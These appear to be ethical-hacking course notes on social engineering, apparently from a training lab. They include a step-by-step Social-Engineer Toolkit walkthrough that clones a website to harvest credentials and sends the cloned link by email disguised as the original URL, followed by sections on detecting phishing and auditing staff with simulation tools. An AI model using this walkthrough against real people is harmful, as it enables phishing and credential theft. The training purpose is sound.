Module 09: Social Engineering

1. Perform social engineering using various techniques

PS: There are three types of social engineering attacks: human-, computer-, and mobile-based.

- Human-based social engineering uses interaction to gather sensitive information, employing techniques such as impersonation,   vishing, and eavesdropping
- Computer-based social engineering uses computers to extract sensitive information, employing techniques such as phishing,   spamming, and instant messaging
- Mobile-based social engineering uses mobile applications to obtain information, employing techniques such as publishing malicious   apps, repackaging legitimate apps, using fake security applications, and SMiShing (SMS Phishing)


a. Sniff credentials using the Social-Engineer Toolkit (SET)

$ setoolkit
> 1   (Social Engineering Attack)
> 2    (Website Attack Vectors)
> 3    (Credential Harvester Attack Methods)
> 2    (Site Cloner)
> 10.10.1.13      (IP Address for the POST back in Harvester/Tabnabbing)
> http://www.moviescope.com        (url to clone)

Send http://10.10.1.13 by email, hyperlinked by original url




2. Detect a phishing attack

a. Detect phishing using Netcraft
b. Detect phishing using PhishTank

PS: PhishTank provides an open API for developers and researchers to integrate anti-phishing data into their applications.

PS: PhishTank is a free community site on which anyone can submit, verify, track, and share phishing data.



3. Audit organization's security for phishing attacks

a. Audit organization's security for phishing attacks using OhPhish

PS: OhPhish is a web-based portal for testing employees’ susceptibility to social engineering attacks. 

It is a phishing simulation tool that provides an organization with a platform to launch phishing simulation campaigns on its employees. The platform captures the responses and provides MIS reports and trends (on a real-time basis) that can be tracked according to the user, department, or designation.






























